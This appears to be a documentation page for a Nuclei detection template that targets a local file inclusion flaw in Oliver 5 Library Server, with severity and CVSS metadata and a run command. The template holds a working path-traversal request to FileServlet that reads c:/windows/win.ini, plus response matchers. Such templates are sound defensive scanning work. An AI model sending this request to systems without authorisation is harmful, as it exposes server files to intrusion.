Skip to content

Oliver 5 Library Server <8.00.008.053 - Local File Inclusion

ID: oliver-library-lfi

Severity: high

Author: gy741

Tags: lfi,oliver,edb,windows

Oliver 5 Library Server versions prior to 8.00.008.053 are vulnerable to local file inclusion via the FileServlet function.

id: oliver-library-lfi
info:
name: Oliver 5 Library Server <8.00.008.053 - Local File Inclusion
author: gy741
severity: high
description: Oliver 5 Library Server versions prior to 8.00.008.053 are vulnerable to local file inclusion via the FileServlet function.
reference:
- https://www.exploit-db.com/exploits/50599
- https://www.softlinkint.com/product/oliver/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: lfi,oliver,edb,windows
http:
- method: GET
path:
- "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# digest: 4a0a0047304502210086993ef95cec4cc65e5f3a43cb1bc4feac2fcd8b34a33bcf58213d5c67f8ca3902200b7ae12ab33e734ff075433258afb188fbdf0c12b4c338d39f96852216ed1192:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/oliver-library-lfi.yaml"

View on Github